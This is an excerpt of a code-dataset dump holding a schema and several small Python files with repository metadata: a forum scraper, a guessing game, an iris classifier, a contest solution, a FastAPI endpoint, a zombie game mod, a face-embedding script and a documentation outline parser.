Column schema (name: type, observed range / distinct values):

repo_name: string, lengths 7-111
__id__: int64, 16.6k-19,705B
blob_id: string, lengths 40-40
directory_id: string, lengths 40-40
path: string, lengths 5-151
content_id: string, lengths 40-40
detected_licenses: sequence
license_type: string, 2 values
repo_url: string, lengths 26-130
snapshot_id: string, lengths 40-40
revision_id: string, lengths 40-40
branch_name: string, lengths 4-42
visit_date: unknown
revision_date: unknown
committer_date: unknown
github_id: int64, 14.6k-687M
star_events_count: int64, 0-209k
fork_events_count: int64, 0-110k
gha_license_id: string, 12 values
gha_fork: bool, 2 classes
gha_event_created_at: unknown
gha_created_at: unknown
gha_updated_at: unknown
gha_pushed_at: unknown
gha_size: int64, 0-10.2M
gha_stargazers_count: int32, 0-178k
gha_forks_count: int32, 0-88.9k
gha_open_issues_count: int32, 0-2.72k
gha_language: string, lengths 1-16
gha_archived: bool, 1 class
gha_disabled: bool, 1 class
content: string, lengths 10-2.95M
src_encoding: string, 5 values
language: string, 1 value
is_vendor: bool, 2 classes
is_generated: bool, 2 classes
length_bytes: int64, 10-2.95M
extension: string, 19 values
num_repo_files: int64, 1-202k
filename: string, lengths 4-112
num_lang_files: int64, 1-202k
alphanum_fraction: float64, 0.26-0.89
alpha_fraction: float64, 0.2-0.89
hex_fraction: float64, 0-0.09
num_lines: int32, 1-93.6k
avg_line_length: float64, 4.57-103
max_line_length: int64, 7-931
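The columns above are the per-file metadata typically used to filter a source-code corpus (language, vendor/generated flags, size, character-composition fractions). As a hedged illustration only, and not part of the original dump, the sketch below shows how rows with this schema might be filtered once loaded as plain Python dicts; the field names come from the schema, while the function name and the threshold values are arbitrary assumptions.

# Minimal sketch, assuming each record is available as a Python dict with the fields above.
# keep_record() and its thresholds are illustrative assumptions, not part of the dataset.
def keep_record(row: dict) -> bool:
    """Return True for rows that look like human-written, reasonably sized Python files."""
    return (
        row.get("language") == "Python"
        and not row.get("is_vendor", False)
        and not row.get("is_generated", False)
        and 10 <= row.get("length_bytes", 0) <= 100_000
        and row.get("alpha_fraction", 0.0) >= 0.2
    )

example_row = {
    "language": "Python",
    "is_vendor": False,
    "is_generated": False,
    "length_bytes": 2033,
    "alpha_fraction": 0.54,
}
print(keep_record(example_row))  # -> True

How the records are actually read (Parquet, JSONL, a dataset loader) is outside what the schema itself specifies.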
defchen/LearningPython
850,403,574,402
6c6d6adf8bb666987fe66f6fccbd517d0d402fd4
061fa1504d59e24bc379c4c91670f926aa516d07
/learning/spider/spider_to_1024.py
29d2d579f17ade1d2f38a0c8b5056246a91167ed
[]
no_license
https://github.com/defchen/LearningPython
a5189c643fee667e0705bce24e385bf7e4288ae5
eaae52dd7aef3ba97b333b784f2fcf8b9ba5002b
refs/heads/master
"2021-01-22T10:46:34.776000"
"2017-02-15T07:53:31"
"2017-02-15T07:53:31"
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
""" @Author: liujinjia @Date: 2017-02-15 13:52:42 @Project : LearningPython @File : spider_to_1024.py @Last Modified by: liujinjia @Last Modified time: 2017-02-15 15:49:05 """ import requests from bs4 import BeautifulSoup class Spider: """ 1024 img spider """ start_url = 'http://www.dxlymm.com/thread0806.php?fid=5' session = requests.Session() @classmethod def get_home_page(cls, url=None): """ get 1024 img page """ if url is None: page = cls.session.get(cls.start_url) else: page = cls.session.get(url) page.encoding = 'gbk' return page.text @classmethod def parse_pages(cls): """ parse 1024 pages """ parse = BeautifulSoup(cls.get_home_page(), 'lxml') parse = parse.findAll('tr') return parse @classmethod def get_uri_list(cls): """ get parse list url """ uri_list = [] for item in cls.parse_pages(): if item.h3 is not None: # print(item.h3.a.get('href'), item.h3.a.string) uri_list.append("http://www.dxlymm.com/" + item.h3.a.get('href')) return uri_list @classmethod def get_seed_page(cls): """ get pages seeds """ page = cls.get_home_page(cls.get_uri_list()[11]) return BeautifulSoup(page, 'lxml').find('a', {"target": "_blank"}).string @classmethod def get_seed(cls): """ get seeds http://www.rmdown.com/download.php?ref=163b9b55fba74fbc988124acb4db8b23bbc739bf55e&reff=MTQ4NzE0NDcwOA%3D%3D&submit=download this func get some element <INPUT size=58 name="ref" value="163b9b55fba74fbc988124acb4db8b23bbc739bf55e" style="font-size:10px;"><INPUT TYPE="hidden" NAME="reff" value="MTQ4NzE0NDU2Nw=="><BR> get this tags , value and value splicing into url, download seeds! """ page = cls.get_home_page(cls.get_seed_page()) print(page) if __name__ == '__main__': print(Spider.get_seed())
UTF-8
Python
false
false
2,033
py
3
spider_to_1024.py
3
0.596353
0.54066
0
67
29.268657
132
IsaacYAGI/python-ejercicios
2,327,872,276,990
8498ba69e4cc5c5f480644ac20d878fb2a632bee
50b69776bee7ad3a6068235c6c8981c06a17629a
/tema39-biblioteca-estandar-python/ejercicios-propuestos/ejercicio_propuestos1_tema39.py
aec8b8678f361a8deff93de03c4eb45b80a56732
[]
no_license
https://github.com/IsaacYAGI/python-ejercicios
665db9b6286d4840e8fa9c2d9b42b1389753b806
fe8d9b96a7e947dd3fa992dfac39049fa68935c5
refs/heads/master
"2021-06-04T11:03:53.466000"
"2017-07-29T03:17:15"
"2017-07-29T03:17:15"
98,049,960
3
3
null
false
"2021-02-24T05:07:15"
"2017-07-22T18:20:42"
"2017-07-22T20:33:05"
"2021-02-24T05:06:37"
23
0
1
0
Python
false
false
'''
Write a program that generates a random number between 1 and 100 without showing it.
The operator must try to guess the number. Each time a number is entered, show the
message "Gano" if it equals the generated number, or otherwise a message saying
whether the random number is higher or lower. When the player wins, show how many
attempts were needed.
'''
import random


def generar_numero_aleatorio():
    return random.randint(1,100)


def es_el_numero(resp_usuario,resp_correc):
    return resp_usuario == resp_correc


def numero_dado_es_mayor(resp_usuario,resp_correc):
    return resp_usuario > resp_correc


def juego_terminado(numero_correcto,numero_intentos):
    print("El juego ha terminado!")
    print("El numero correcto era",numero_correcto,"y lo resolviste en",numero_intentos,"intentos.",sep=" ")


def el_numero_es_mayor():
    print("El numero que diste es mayor al correcto, intenta de nuevo!")


def el_numero_es_menor():
    print("El numero que diste es menor al correcto, intenta de nuevo!")


def iniciar_juego():
    gano = False
    intentos = 1
    numero = 0
    respuesta_correc = generar_numero_aleatorio()
    while (not gano):
        numero = int(input("Ingresa un numero: "))
        if (es_el_numero(numero,respuesta_correc)):
            juego_terminado(respuesta_correc,intentos)
            gano = True
        else:
            if (numero_dado_es_mayor(numero,respuesta_correc)):
                el_numero_es_mayor()
            else:
                el_numero_es_menor()
        intentos += 1


iniciar_juego()
UTF-8
Python
false
false
1,588
py
30
ejercicio_propuestos1_tema39.py
29
0.663717
0.656764
0
54
28.259259
147
jordanfalcao/tensorflow2-deeplearning
7,756,710,980,553
e491237e5c49d13e4363c4bcd0dd5fda87ca745f
6c64e6c286db85d8f57cdaf79f2e3a6109209bb2
/10-Deployment/01_my_basic_model.py
3aecceebbd6e086c156880dfb63e41bee7287843
[]
no_license
https://github.com/jordanfalcao/tensorflow2-deeplearning
0f929a6429057c3da19e382245ab493e08b0c18a
2d88d4cb888226cfda7ac4c163fceb452aba103a
refs/heads/main
"2023-07-10T17:58:09.864000"
"2021-08-19T23:29:00"
"2021-08-19T23:29:00"
383,968,761
0
0
null
false
"2021-08-05T22:44:38"
"2021-07-08T01:34:38"
"2021-08-04T19:42:33"
"2021-08-05T22:44:37"
36,592
0
0
0
Jupyter Notebook
false
false
# -*- coding: utf-8 -*- """01-My-Basic-Model.ipynb Automatically generated by Colaboratory. Original file is located at https://colab.research.google.com/drive/1mwM8WLV4fZGkmgwC4EVh91Hfz2bqfUR9 # DEPLOYMENT **Welcome to deployment section! In this section of the course, we will go through the entire deployment process, starting as if you had to create a servicable model from scratch, then deploy it for others to use, either through API or a web form.** # Data For this example we use the very common data set: [iris dataset](https://en.wikipedia.org/wiki/Iris_flower_data_set), which is about flowers. From Wikipedia: The Iris flower data set or Fisher's Iris data set is a multivariate data set introduced by the British statistician and biologist Ronald Fisher in his 1936 paper The use of multiple measurements in taxonomic problems as an example of linear discriminant analysis.[1] It is sometimes called Anderson's Iris data set because Edgar Anderson collected the data to quantify the morphologic variation of Iris flowers of three related species.[2] Two of the three species were collected in the Gaspé Peninsula "all from the same pasture, and picked on the same day and measured at the same time by the same person with the same apparatus".[3] The data set consists of 50 samples from each of three species of Iris (Iris setosa, Iris virginica and Iris versicolor). Four features were measured from each sample: the length and the width of the sepals and petals, in centimeters. """ import numpy as np import pandas as pd import matplotlib.pyplot as plt iris = pd.read_csv("iris.csv") iris.head() """## Data Processing ### Features and Target """ X = iris.drop('species',axis=1) y = iris['species'] y.unique() # Lots of ways to one hot encode # https://stackoverflow.com/questions/47573293/unable-to-transform-string-column-to-categorical-matrix-using-keras-and-sklearn # https://stackoverflow.com/questions/35107559/one-hot-encoding-of-string-categorical-features from sklearn.preprocessing import LabelBinarizer encoder = LabelBinarizer() y = encoder.fit_transform(y) y[45:55] """## Train Test Split""" from sklearn.model_selection import train_test_split from sklearn.preprocessing import MinMaxScaler X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=101) """### Scaling""" scaler = MinMaxScaler() scaler.fit(X_train) scaled_X_train = scaler.transform(X_train) scaled_X_test = scaler.transform(X_test) """## Model ### Creating the Model """ from tensorflow.keras.models import Sequential from tensorflow.keras.layers import Dense model = Sequential() model.add(Dense(units=4,activation='relu',input_shape=[4,])) # Last layer for multi-class classification of 3 species model.add(Dense(units=3,activation='softmax')) model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy']) """## Model Training""" from tensorflow.keras.callbacks import EarlyStopping early_stop = EarlyStopping(patience=10) # model.fit(x=scaled_X_train, # y=y_train, # epochs=300, # validation_data=(scaled_X_test, y_test), verbose=1 ,callbacks=[early_stop]) """## Model Evaluation""" metrics = pd.DataFrame(model.history.history) metrics.head() metrics[['loss','val_loss']].plot() plt.show() metrics[['accuracy','val_accuracy']].plot() plt.show() model.evaluate(scaled_X_test,y_test,verbose=0) """## Ready Model for Deployment""" epochs = len(metrics) # all the data scaled_X = scaler.fit_transform(X) model = Sequential() model.add(Dense(units=4,activation='relu')) # Last layer for multi-class 
classification of 3 species model.add(Dense(units=3,activation='softmax')) model.compile(optimizer='adam', loss='categorical_crossentropy',metrics=['accuracy']) model.fit(scaled_X,y,epochs=epochs) model.evaluate(scaled_X_test,y_test,verbose=0) model.save("final_iris_model.h5") """### Saving Scaler""" import joblib joblib.dump(scaler,'iris_scaler.pkl') """## Predicting a Single New Flower""" from tensorflow.keras.models import load_model flower_model = load_model("final_iris_model.h5") flower_scaler = joblib.load("iris_scaler.pkl") iris.head(1) flower_example = {'sepal_length':5.1, 'sepal_width':3.5, 'petal_length':1.4, 'petal_width':0.2} flower_example.keys() encoder.classes_ def return_prediction(model,scaler,sample_json): # For larger data features, you should probably write a for loop # That builds out this array for you s_len = sample_json['sepal_length'] s_wid = sample_json['sepal_width'] p_len = sample_json['petal_length'] p_wid = sample_json['petal_width'] flower = [[s_len,s_wid,p_len,p_wid]] flower = scaler.transform(flower) classes = np.array(['setosa', 'versicolor', 'virginica']) class_ind = np.argmax(model.predict(flower), axis=-1) # deprecated # class_ind = model.predict_classes(flower) return classes[class_ind][0] # calling the fuction return_prediction(flower_model,flower_scaler,flower_example)
UTF-8
Python
false
false
5,143
py
70
01_my_basic_model.py
36
0.720537
0.706145
0
186
26.650538
636
takecian/ProgrammingStudyLog
13,984,413,562,158
46099aa352116e9ec26130b601e61b559c60c7fe
bde6ed092b7b29703737e11c5a5ff90934af3d74
/AtCoder/typical_dp/006c.py
2e87c3a9bfb5a07e9b900a274e0044898c002dc6
[]
no_license
https://github.com/takecian/ProgrammingStudyLog
2ab7ea601e0996b3fa502b81ec141bc3772442b6
94485d131c0cc9842f1f4799da2d861dbf09b12a
refs/heads/master
"2023-04-28T16:56:18.943000"
"2023-04-18T06:34:58"
"2023-04-18T06:34:58"
128,525,713
4
0
null
false
"2022-12-09T06:15:19"
"2018-04-07T12:21:29"
"2022-07-04T14:37:10"
"2022-12-09T06:15:18"
18,241
3
0
7
Python
false
false
# https://beta.atcoder.jp/contests/abc006/tasks/abc006_3
# a + b + c = N
# 2a + 3b + 4c = M

N, M = map(int, input().split())

#
# ans_a = -1
# ans_a = -1
# ans_a = -1
#
# for a in range(N+1):
#     rest = N - a
#     for b in range(rest+1):
#         c = rest - b
#         if c < 0:
#             break
#         if 2 * a + 3 * b + 4 * c == M:
#             print(str(a) + ' ' + str(b) + ' ' + str(c) + '\n')
#             exit(0)
#
# print('-1 -1 -1\n')
#

# in case of 0 elder person
# a + c = N
# 2a + 4c = M
if M % 2 == 0:
    a = 2 * N - M // 2
    c = M // 2 - N
    if a >= 0 and c >= 0:
        print(str(a) + ' 0 ' + str(c) + '\n')
        exit(0)

if M % 2 == 1:
    a = 2 * N - (M + 1) // 2
    c = -N + (M - 1) // 2
    if a >= 0 and c >= 0:
        print(str(a) + ' 1 ' + str(c) + '\n')
        exit(0)

print('-1 -1 -1\n')

# in case of 1 elder person
# a + c = N - 1
# 2a + 4c = M - 3
UTF-8
Python
false
false
902
py
883
006c.py
861
0.370288
0.310421
0
46
18.608696
64
sntzhd/sntzhd_back
5,617,817,273,287
a3b60d92805b9955365f9eccdc031a62f67b9ee2
8424f7ca88935497df49544e60e9ed48a6243e0e
/backend_api/indication/endpoints.py
b15d252109df992eaa34b10641e96eede5b7ae34
[]
no_license
https://github.com/sntzhd/sntzhd_back
622996d0ea917f4a24fbb74620fb130266979078
13128989bd53657d55c5154f56e56a5944f7b771
refs/heads/master
"2023-05-24T09:25:05.120000"
"2021-06-13T11:16:58"
"2021-06-13T11:16:58"
367,019,313
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from fastapi import Depends, FastAPI, HTTPException, APIRouter

from backend_api.db.sql_app import crud, database, models, schemas
from backend_api.db.sql_app.database import db_state_default

database.db.connect()
database.db.create_tables([models.Item])
database.db.close()

router = APIRouter()


async def reset_db_state():
    database.db._state._state.set(db_state_default.copy())
    database.db._state.reset()


def get_db(db_state=Depends(reset_db_state)):
    try:
        database.db.connect()
        yield
    finally:
        if not database.db.is_closed():
            database.db.close()


@router.post(
    "/items/",
    response_model=schemas.ItemBase,
    dependencies=[Depends(get_db)],
)
def create_item_for_user(item: schemas.ItemBase):
    return crud.create_item(item=item)
UTF-8
Python
false
false
796
py
37
endpoints.py
32
0.69598
0.69598
0
31
24.709677
66
EmaSMach/info2020
12,970,801,279,010
8e13fbe8b71dccad22b43ca25bbdb368d8776d0a
fdb8d96d06cb7e74153a178fd17b449e89f44cd0
/desafios/complementarios/condicionales/desafio16_descuento_camisas.py
1183312cd82977baba879c036daddeb3c2dd341f
[]
no_license
https://github.com/EmaSMach/info2020
c84916521d2dd21040419cb469c76c589b98be89
a184dc376cb5e0b894a32d01681b71c824d993d3
refs/heads/master
"2022-12-06T08:52:34.994000"
"2020-08-24T02:57:40"
"2020-08-24T02:57:40"
273,131,222
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# Challenge 16
# Write a program that computes the total to pay for a purchase of shirts.
# If three or more shirts are bought, a 20% discount is applied to the
# purchase total; if fewer than three shirts, a 10% discount.

cantidad_camnisas = int(input("Camisas Compradas: "))
precio_camisa = float(input("Precio camisa: "))

if cantidad_camnisas >= 3:
    descuento = 20
else:
    descuento = 10

subtotal = precio_camisa * cantidad_camnisas
print(f"Total a pagar: $ {subtotal - (subtotal*descuento/100)}")
UTF-8
Python
false
false
528
py
67
desafio16_descuento_camisas.py
67
0.719165
0.6926
0
17
30
75
Colorpinpoint/pyspades-userscripts
8,486,855,423,698
7d1293b78c5de507e828d9512a246869993c9615
87df4bda6d6da9b1ce0360328a372c54037e4264
/zombies.py
c6ed0877c75ab263f9846bbed0182904367f4b8f
[]
no_license
https://github.com/Colorpinpoint/pyspades-userscripts
58910c3ca3c3b31d5f9c8d76b5a55e97c083fd10
e0c24f10312d9f72031723747c48fbd456e780bf
refs/heads/master
"2016-10-10T11:35:46.593000"
"2012-07-30T03:23:18"
"2012-07-30T03:23:18"
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from pyspades.server import orientation_data, grenade_packet, weapon_reload, set_tool from pyspades.common import coordinates, Vertex3 from pyspades.world import Grenade from commands import add, admin from math import sin, floor, atan2 from pyspades.constants import * from pyspades.server import block_action from pyspades.collision import distance_3d from twisted.internet.task import LoopingCall HEAL_RATE = 1000 HUMAN = 1 ZOMBIE = 2 # ZOMBIE_HUMAN = HUMAN | ZOMBIE S_ZOMBIE_VERSION = 'Zombies 1.1.0 RC1 by Dany0, infogulch' S_ZOMBIE_HEALTH = 'Zombie health is %i.' S_ZOMBIE_TELEPORT = 'Zombies teleport %i blocks high.' S_ZOMBIE_SPAWN = 'Zombies spawn %i blocks high.' S_ZOMBIE_STAT = S_ZOMBIE_HEALTH + ' ' + S_ZOMBIE_TELEPORT + ' ' + S_ZOMBIE_SPAWN @admin def zhp(connection, value): if value == 0: a = True protocol = connection.protocol protocol.ZOMBIE_HP = abs(float(value)) connection.send_chat(S_ZOMBIE_HEALTH % value) @admin def ztel(connection, value): protocol = connection.protocol val = abs(int(value)) protocol.ZOMBIE_TELEPORT = val connection.send_chat(S_ZOMBIE_TELEPORT % val) @admin def zspawnheight(connection, value): protocol = connection.protocol val = abs(int(value)) if val >= 10: protocol.ZOMBIE_SPAWN_HEIGHT = val connection.send_chat(S_ZOMBIE_SPAWN % val) elif val < 10: protocol.ZOMBIE_SPAWN_HEIGHT = 0 connection.send_chat('Disabling zombie spawning up in the air') def zombiestat(connection): connection.send_chat(S_ZOMBIE_VERSION) connection.send_chat(S_ZOMBIE_STAT % (connection.protocol.ZOMBIE_HP, connection.protocol.ZOMBIE_TELEPORT)) add(ztel) add(zhp) add(zombiestat) add(zspawnheight) def apply_script(protocol, connection, config): class ZombiesProtocol(protocol): def __init__(self, *arg, **kw): protocol.__init__(self, *arg, **kw) self.ZOMBIE_TELEPORT = 17 self.ZOMBIE_HP = 650 self.ZOMBIE_SPAWN_HEIGHT = 0 class ZombiesConnection(connection): zombies_playermode = 0 #must be a class instance variable to overload connection.refill() def on_spawn(self, pos): if self.team is self.protocol.green_team: # once spawned, human-zombies turn back into zombies self.zombies_playermode = ZOMBIE self.health_message = False self.quickbuild_allowed = False self.clear_ammo() ## this makes zombies appear to have a weapon when they have a block # set_tool.player_id = self.player_id # set_tool.value = SPADE_TOOL # self.protocol.send_contained(set_tool, sender = self) if self.protocol.ZOMBIE_SPAWN_HEIGHT > 0: player_location = self.world_object.position loc = (player_location.x, player_location.y, player_location.z - self.protocol.ZOMBIE_SPAWN_HEIGHT) self.set_location_safe(loc) else: self.zombies_playermode = HUMAN self.health_message = True self.quickbuild_allowed = True return connection.on_spawn(self, pos) def create_explosion_effect(self, position): self.protocol.world.create_object(Grenade, 0.1, position, None, Vertex3(), None) grenade_packet.value = 0.0 grenade_packet.player_id = 32 grenade_packet.position = position.get() grenade_packet.velocity = (0.0, 0.0, 0.0) self.protocol.send_contained(grenade_packet) def on_line_build_attempt(self, points): if self.zombies_playermode == ZOMBIE: return False return connection.on_line_build_attempt(points) def on_block_build_attempt(self, x, y, z): if self.zombies_playermode == ZOMBIE: return False return connection.on_block_build_attempt(self, x, y, z) def on_block_destroy(self, x, y, z, value): if (self.zombies_playermode == ZOMBIE and value == DESTROY_BLOCK and self.tool == SPADE_TOOL): map = self.protocol.map ztel = self.protocol.ZOMBIE_TELEPORT 
player_location = self.world_object.position px, py, pz = player_location.x, player_location.y, player_location.z if (not map.get_solid(px, py, pz-ztel+1) and not map.get_solid(px, py, pz-ztel+2) and not map.get_solid(px, py, pz-ztel+3)): self.create_explosion_effect(player_location) self.set_location((px, py, pz - ztel)) return connection.on_block_destroy(self, x, y, z, value) def on_flag_capture(self): if self.team is self.protocol.green_team: self.zombies_playermode = HUMAN self.refill() self.send_chat('YOU ARE HUMAN NOW RAWR GO SHOOT EM') self.protocol.send_chat('%s has become a human-zombie and can use weapons!' % self.name) return connection.on_flag_capture(self) def on_flag_take(self): if self.team is self.protocol.blue_team: self.set_hp(self.hp*2) else: self.set_hp(self.hp/1.6) return connection.on_flag_take(self) def on_grenade(self, time_left): if self.zombies_playermode == ZOMBIE: self.send_chat("Zombie! You fool! You forgot to unlock the pin! It's useless now!") return False return connection.on_grenade(self, time_left) def on_hit(self, hit_amount, hit_player, type, grenade): new_hit = connection.on_hit(self, hit_amount, hit_player, type, grenade) if new_hit is not None: return new_hit other_player_location = hit_player.world_object.position other_player_location = (other_player_location.x, other_player_location.y, other_player_location.z) player_location = self.world_object.position player_location = (player_location.x, player_location.y, player_location.z) dist = floor(distance_3d(player_location, other_player_location)) damagemulti = (sin(dist/80))+1 new_hit = hit_amount * damagemulti if self is hit_player: if type == FALL_KILL: return False elif hit_player.zombies_playermode == ZOMBIE and self.weapon == SMG_WEAPON: new_hit = (new_hit/(self.protocol.ZOMBIE_HP/100)) if new_hit >=25: self.create_explosion_effect(hit_player.world_object.position) self.send_chat("!!!HOLY SHIT UBER DAMAGE!!!") elif hit_player.zombies_playermode == ZOMBIE and self.weapon != SMG_WEAPON: if self.weapon == SHOTGUN_WEAPON: new_hit = new_hit/(self.protocol.ZOMBIE_HP/100)/8 else: new_hit = new_hit/(self.protocol.ZOMBIE_HP/100) if new_hit >=25: self.create_explosion_effect(hit_player.world_object.position) self.send_chat("!!!HOLY SHIT UBER DAMAGE!!!") elif self.zombies_playermode == ZOMBIE and type != MELEE_KILL: return False #this should never happen, but just in case elif (self.team is self.protocol.blue_team and self.team == hit_player.team and type == MELEE_KILL): if hit_player.hp >= 100: if self.health_message == True: self.health_message = False self.send_chat(hit_player.name + ' is at full health.') elif hit_player.hp > 0: hit_player.set_hp(hit_player.hp + HEAL_RATE) return new_hit def on_kill(self, killer, type, grenade): if killer != None and killer != self: if killer.zombies_playermode == HUMAN: killer.refill() killer.send_chat('You have been refilled!') else: self.send_chat('THE ZOMBIES ARE COMING RAWRRR') killer.set_hp(killer.hp + 25 - killer.hp/10) return connection.on_kill(self, killer, type, grenade) def clear_ammo(self): weapon_reload.player_id = self.player_id weapon_reload.clip_ammo = 0 weapon_reload.reserve_ammo = 0 self.weapon_object.clip_ammo = 0 self.weapon_object.reserve_ammo = 0 self.send_contained(weapon_reload) def refill(self, local = False): connection.refill(self, local) if self.zombies_playermode == ZOMBIE: self.clear_ammo() def on_login(self, name): protocol = self.protocol self.send_chat(S_ZOMBIE_STAT % (protocol.ZOMBIE_HP, protocol.ZOMBIE_TELEPORT, 
protocol.ZOMBIE_SPAWN_HEIGHT)) return connection.on_login(self, name) return ZombiesProtocol, ZombiesConnection
UTF-8
Python
false
false
9,454
py
5
zombies.py
4
0.576687
0.568542
0
212
43.599057
120
newasu/FaceRecognitionPython
11,957,188,952,317
2692af2249efecee8bd76aebecd71882c942d08e
db6ba700742584d71bd2f9f1d66627060235bb49
/Scripts/testscript_11.py
c909039f83568b5e7a7f880f21920b507cd34489
[]
no_license
https://github.com/newasu/FaceRecognitionPython
27119747e53975a4c19fcf4b89682a4df7498606
536bcfeb852fd1c4f93b59636fbb6182b5e9996f
refs/heads/master
"2021-07-21T05:20:40.363000"
"2021-02-01T08:38:04"
"2021-02-01T08:38:04"
237,888,319
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# Add project path to sys import sys sys.path.append("./././") # Import lib import pandas as pd import numpy as np import os import glob import cv2 from mtcnn.mtcnn import MTCNN import tensorflow as tf from keras_vggface.vggface import VGGFace from keras_vggface import utils # Import my own lib import others.utilities as my_util gpu_id = 0 os.environ["CUDA_VISIBLE_DEVICES"] = str(gpu_id) # Clear GPU cache tf.keras.backend.clear_session() gpus = tf.config.experimental.list_physical_devices('GPU') tf.config.experimental.set_memory_growth(gpus[0], True) ############################################################################################# # Path # Dataset path lfw_test_cleaned_path = my_util.get_path(additional_path=['.', '.', 'mount', 'FaceRecognitionPython_data_store', 'Dataset', 'lfw', 'DevTest', 'cleaned']) lfw_test_crop_face_path = my_util.get_path(additional_path=['.', '.', 'mount', 'FaceRecognitionPython_data_store', 'Dataset', 'lfw', 'DevTest', 'cropped']) # Make directory my_util.make_directory(lfw_test_crop_face_path) ############################################################################################# # Initialise dataframe my_column_names = ['gender', 'ethnicity', 'id', 'pose', 'path'] my_data = pd.DataFrame(columns=my_column_names) # List files dir_list = glob.glob(lfw_test_cleaned_path + '*/*') i = 0 for fp in dir_list: # print(str(i)) i = i+1 # Get path my_path = fp my_dir, my_filename = os.path.split(my_path) # Extract class my_dir = my_dir.split('/')[-1] my_gender, my_ethnicity = my_dir.split('-') # Extract ID my_filename = my_filename.split('.')[0] tmp = my_filename.rfind('_') my_id = my_filename[0:tmp] my_pose = int(my_filename[tmp+1:]) # Append my_data = my_data.append({'gender':my_gender, 'ethnicity':my_ethnicity, 'id':my_id, 'pose':my_pose, 'path':my_path}, ignore_index=True) # Sort my_data = my_data.sort_values(by=['id', 'pose'], ignore_index=True) # Unique id_unique = my_data['id'].unique() # Check correction for id_u in id_unique: tmp = my_data[my_data['id'] == id_u][['gender', 'ethnicity']] if tmp['gender'].unique().size > 1 or tmp['ethnicity'].unique().size > 1: print(id_u) # Initialise pretrained pretrained_model = VGGFace(model = 'resnet50') feature_layer = tf.keras.layers.Flatten(name='flatten')(pretrained_model.get_layer('avg_pool').output) model = tf.keras.models.Model(pretrained_model.input, feature_layer) # Detect face exacted_data = np.empty((0, 2048)) detector = MTCNN() for img_idx in range(0,my_data.shape[0]): print(str(img_idx)) # Load image img = cv2.cvtColor(cv2.imread(my_data['path'][img_idx]), cv2.COLOR_BGR2RGB) faces = detector.detect_faces(img) # Select biggest face face_idx = 0 if len(faces) > 1: facesize = [] for face in faces: _, _, width, height = face['box'] facesize.append(width*height) face_idx = np.argmax(facesize) # Crop face bbox = np.array(faces[face_idx]['box']) bbox[bbox<0] = 0 x1, y1, width, height = bbox x2, y2 = x1 + width, y1 + height img = img[y1:y2, x1:x2] # Convert color space img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR) # Extract feature by pretrained img = cv2.resize(img, (224,224)) img = tf.keras.preprocessing.image.img_to_array(img) img = np.expand_dims(img, axis=0) img = utils.preprocess_input(img, version=2) # vgg = 1, resnet = 2 feature_embedding = model.predict(img) exacted_data = np.vstack((exacted_data, feature_embedding)) # Save img # cv2.imwrite((lfw_test_crop_face_path + '/' + my_data.id.iloc[img_idx] + '_' + str(my_data.pose.iloc[img_idx]).zfill(4)) + '.jpg', img) # Concatenate my_data_columns = 
my_column_names my_data_columns = np.array(my_data_columns) my_data_columns = np.append(my_data_columns, np.char.add(np.tile('feature_', (2048)), np.array(range(1, 2048+1)).astype('U'))) my_data = np.concatenate((my_data.values, exacted_data), axis=1) my_data = pd.DataFrame(my_data, columns=my_data_columns) # Save my_data.to_csv('DevTest_cleaned.txt', header=True, index=False, sep=' ') print()
UTF-8
Python
false
false
4,195
py
55
testscript_11.py
52
0.626222
0.610727
0
129
31.51938
155
coreygirard/harbor
1,374,389,557,538
8875bbcb2bd4c9233439d324a82aa844ff0ef69f
7725ec91175db3e86edf0c5396f0b0dcc680ada1
/harbor/src/outline.py
21269e9c931db22a31f2a55923030bd0a170582a
[]
no_license
https://github.com/coreygirard/harbor
c4bf7829cd3cf5dca61f437321912c90a5a9988c
6ab255562e200eb47f6262e48e0b55978d83fd59
refs/heads/master
"2021-09-28T16:29:14.407000"
"2018-11-18T08:16:56"
"2018-11-18T08:16:56"
113,496,312
8
0
null
null
null
null
null
null
null
null
null
null
null
null
null
'''harbor: readme/how/outline { OUTLINE readme: README.md badges what why how intro outline patterns todo PATTERNS title: # {title} section: ### {section} }[code] {The outline section of the `.harbor` file must be preceded by `OUTLINE`. This section specifies the names of the files to be generated, and their internal structure}[p] ''' def extractOutline(text): ''' >>> text = ['OUTLINE', ... 'aaa', ... 'bbb', ... 'ccc', ... '', ... 'PATTERNS', ... 'ddd', ... 'eee', ... 'fff', ... ''] >>> extractOutline(text) ['aaa', 'bbb', 'ccc', ''] ''' assert(text.count('OUTLINE') <= 1) assert(text.count('PATTERNS') <= 1) if 'OUTLINE' in text: text = text[text.index('OUTLINE')+1:] if 'PATTERNS' in text: text = text[:text.index('PATTERNS')] return text '''harbor: readme/how/outline {Each line in the `OUTLINE` section without indentation denotes a file. The form is `aaa: bbb`, where `aaa` is the nickname for the file, and `bbb` is the actual filename to use when saving the generated documentation.}[p] {Basic outline indentation rules apply, with regard to how nesting works. The sections can have arbitrary names, excluding spaces. Best practice for multi-word sections is Lisp-style naming: `another-section` or `this-is-a-wordy-label`.}[p] ''' def getOutline(i): ''' >>> raw = [['OUTLINE', ... 'readme: README.md', ... ' aaa', ... ' bbb', ... ' ccc', ... ' ddd', ... ' eee', ... ' fff'], ... ['OUTLINE', ... 'quickstart: quickstart.md', ... ' step-1', ... ' step-2', ... ' step-3']] >>> getOutline(raw) == {'README.md':['readme', ... 'readme/aaa', ... 'readme/bbb', ... 'readme/bbb/ccc', ... 'readme/ddd', ... 'readme/ddd/eee', ... 'readme/ddd/fff'], ... 'quickstart.md': ['quickstart', ... 'quickstart/step-1', ... 'quickstart/step-2', ... 'quickstart/step-3']} True ''' text = [] for e in i: text += extractOutline(e) filenames = {} stack = {} for line in text: if line.strip() != '': n = len(line)-len(line.lstrip()) line = line.strip() assert(n%2 == 0) if n == 0: line,f = line.split(' ') line = line.strip(':') filenames[f] = [] stack[n] = line stack = {k:v for k,v in stack.items() if k <= n} path = '/'.join([stack[k] for k in sorted(stack.keys())]) filenames[f] += [path] return filenames
UTF-8
Python
false
false
3,148
py
19
outline.py
14
0.435197
0.431385
0
120
25.225
95
RiskIQ/msticpy
10,488,310,144,212
6e074d0ba4b9b69fdaae8da88c6bbd6723070bd4
